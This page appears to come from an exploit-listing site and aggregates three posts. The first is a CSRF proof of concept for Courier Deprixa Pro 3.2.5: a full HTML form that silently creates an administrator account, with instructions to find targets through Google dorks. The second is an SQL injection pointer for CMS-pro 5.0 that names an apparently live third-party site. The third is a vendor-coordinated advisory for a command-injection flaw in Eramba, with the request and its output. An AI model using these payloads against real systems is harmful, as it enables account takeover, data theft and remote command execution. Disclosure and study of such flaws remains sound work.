Latest exploits :: CodePwn

<pre><code>====================================================================================================================================<br />| # Title : Courier Deprixa Pro - Integrated Web System v3.2.5 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : https://codecanyon.net/item/courier-deprixa-pro-integrated-web-system-v32/15216982 | <br />| # Dork : DEPRIXA 3.2.5 | lOGIN |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code create a new admin .<br /><br />[+] Go to the line 7.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] infected file : settings/addusersadmin/agregar.php<br /><br />[+] save code as poc.html .<br /><br /><div class="modal-content"><br /> <div class="modal-header"><br /> <h4 class="modal-title" id="myModalLabel"><i class="fa fa-user-plus"></i>New Administrator</h4><br /> </div><br /> <div class="modal-body"><br /> <br /> <form action="https://127.0.0.1/bluedotcourriercom/dashboard/settings/addusersadmin/agregar.php" data-parsley-validate="" novalidate="" method="post" class="form-horizontal" enctype="multipart/form-data"><br /> <div class="form-group " id="gnombrepa"><br /> <label for="off_name" class="col-sm-2 control-label"></label><br /> <div class="col-sm-10"><br /> <input class="form-control off_name" parsley-trigger="change" required="" name="name_parson" placeholder="Administrator Name" data-parsley-id="4" type="text"><br /> </div><br /> </div><br /> <div class="form-group" id="gapellido"><br /> <label for="email" class="col-sm-2 control-label">Email</label><br /> <div class="col-sm-5"><br /> <input class="form-control email" name="email" id="id_mail" placeholder="demo@demo.com" required="" onkeyup="javascript:validateMail('id_mail')" data-parsley-id="6" type="text"><br /> <strong><span id="emailOK"></span></strong><br /> <p class="error"></p><br /> </div><br /> <div class="col-sm-5"><br /> <input class="form-control phone" name="phone" parsley-trigger="change" required="" placeholder="Phone" data-parsley-id="8"> <br /> </div><br /> </div><br /> <div class="form-group" id="gemail"><br /> <label for="office" class="col-sm-2 control-label">Office</label><br /> <div class="col-sm-5"><br /> <input class="form-control office" parsley-trigger="change" required="" name="office" placeholder="Name of the Office" data-parsley-id="10" type="text"><br /> </div><br /> <div class="col-sm-5"><br /> <select type="text" class="form-control role" name="role" data-parsley-id="12"><br /> <option value="Administrator">Administrator</option> <br /> </select><br /> </div><br /> </div><br /> <div class="form-group " id="gnombre"><br /> <label for="off_name" class="col-sm-2 control-label">User</label><br /> <div class="col-sm-10"><br /> <input class="form-control off_name" parsley-trigger="change" required="" name="name" placeholder="Username" data-parsley-id="14" type="text"><br /> </div><br /> </div><br /> <div class="form-group" id="gpassword"><br /> <label for="pwd" class="col-sm-2 control-label">Password</label><br /> <div class="col-sm-10"><br /> <input class="form-control pwd" parsley-trigger="change" required="" name="pwd" placeholder="Password" data-parsley-id="16" type="text"><br /> </div><br /> </div><br /> <br><br><br /> <div class="col-sm-offset-2 col-sm-10"><br /> <div class="checkbox"><br /> <label class="i-checks i-checks-sm"><br /> <input type="checkbox" name="estado" value="1" onclick="return false" checked ><br /> <i></i><br /> State </label><br /> </div><br /> <div class="checkbox"><br /> <label class="i-checks i-checks-sm"><br /> <input type="checkbox" name="type" value="a" onclick="return false" checked ><br /> <i></i><br /> User Type </label><br /> </div><br /> </div><br /> <br /> <br /> </div><br /> </br></br><br /> <div class="modal-footer"><br /> <button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i><br /> Close</button><br /> <input class="btn btn-success" name="Submit" type="submit" id="submit" value="Save"><br /> </div><br /> </form> <br /> </div><br /> </div><br /> </div><br />  <br /> </div><br /> <br /> </div><br /> </div> <br /> </div><br /> <br /> </div><br /> </div><br />  <br /> </div><br /> </div><br /> </div><br /> <br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>

<pre><code>======================================================================================================================================<br />| # Title : ِCMS-pro v.5.0 Sql injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : https://Wojoscripts.com | <br />| # Dork : Wojoscripts Copyright © 2018 Wojoscripts.com |<br />======================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] Use Payload : /eventpage.php?id= <br /><br />[+] http://wtodaystexascountrycom/eventpage.php?id=17182974 <=====| iinject here<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>

<pre><code># Trovent Security Advisory 2303-01 #<br />#####################################<br /><br /><br />Authenticated remote code execution in Eramba<br />#############################################<br /><br /><br />Overview<br />########<br /><br />Advisory ID: TRSA-2303-01<br />Advisory version: 1.0<br />Advisory status: Public<br />Advisory URL: https://trovent.io/security-advisory-2303-01<br />Affected product: Eramba<br />Affected version: 3.19.1 (Enterprise and Community edition)<br />Vendor: Eramba Limited, https://www.eramba.org<br />Credits: Trovent Security GmbH, Sergey Makarov<br /><br /><br />Detailed description<br />####################<br /><br />Eramba is a web application for managing Governance, Risk, and Compliance (GRC).<br />Trovent Security GmbH discovered that the Eramba web application allows remote<br />code execution for authenticated users.<br />A possible attacker is able to modify the parameter "path" in the URL<br />"https://hostname/settings/download-test-pdf?path=" to execute arbitrary<br />commands in the context of the user account the application is running in.<br />To see the output of the executed command in the HTTP response, debug mode has<br />to be enabled.<br /><br />Severity: High<br />CVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)<br />CVE ID: CVE-2023-36255<br />CWE ID: CWE-94<br /><br /><br />Proof of concept<br />################<br /><br />HTTP request:<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1<br />Host: [redacted]<br />Cookie: translation=1; csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Referer: https://[redacted]/settings<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />Te: trailers<br />Connection: close<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />HTTP response:<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />HTTP/1.1 500 Internal Server Error<br />Date: Fri, 31 Mar 2023 12:37:55 GMT<br />Server: Apache/2.4.41 (Ubuntu)<br />Access-Control-Allow-Origin: *<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Disposition: attachment; filename="test.pdf"<br />X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 2033469<br /><br /><!DOCTYPE html><br /><html><br /><head><br /> <meta charset="utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title><br /> Error: The exit status code '127' says something went wrong:<br />stderr: "sh: 1: --dpi: not found<br />"<br />stdout: "1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000<br /> link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00<br /> inet 127.0.0.1/8 scope host lo<br /> valid_lft forever preferred_lft forever<br /> inet6 ::1/128 scope host<br /> valid_lft forever preferred_lft forever<br />2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000<br /> link/ether [redacted] brd ff:ff:ff:ff:ff:ff<br /> inet [redacted] brd [redacted] scope global ens33<br /> valid_lft forever preferred_lft forever<br /> inet6 [redacted] scope link<br /> valid_lft forever preferred_lft forever<br />"<br />command: ip a; --dpi '90' --lowquality --margin-bottom '0' --margin-left '0'<br /> --margin-right '0' --margin-top '0' --orientation 'Landscape'<br /> --javascript-delay '1000' '/tmp/knp_snappy6426d4231040e1.91046751.html'<br />'/tmp/knp_snappy6426d423104587.46971034.pdf'. </title><br /><br />[...]<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />Solution / Workaround<br />#####################<br /><br />The vendor released a fixed version of Eramba.<br /><br />Fixed in version 3.19.2.<br /><br /><br />History<br />#######<br /><br />2023-03-31: Vulnerability found<br />2023-04-04: Vendor contacted<br />2023-04-17: Vendor confirmed vulnerability<br />2023-04-20: Vendor released fixed version<br />2023-05-25: Trovent verified remediation of the vulnerability<br />2023-06-13: CVE ID requested<br />2023-07-28: CVE ID received<br />2023-08-01: Advisory published<br /></code></pre>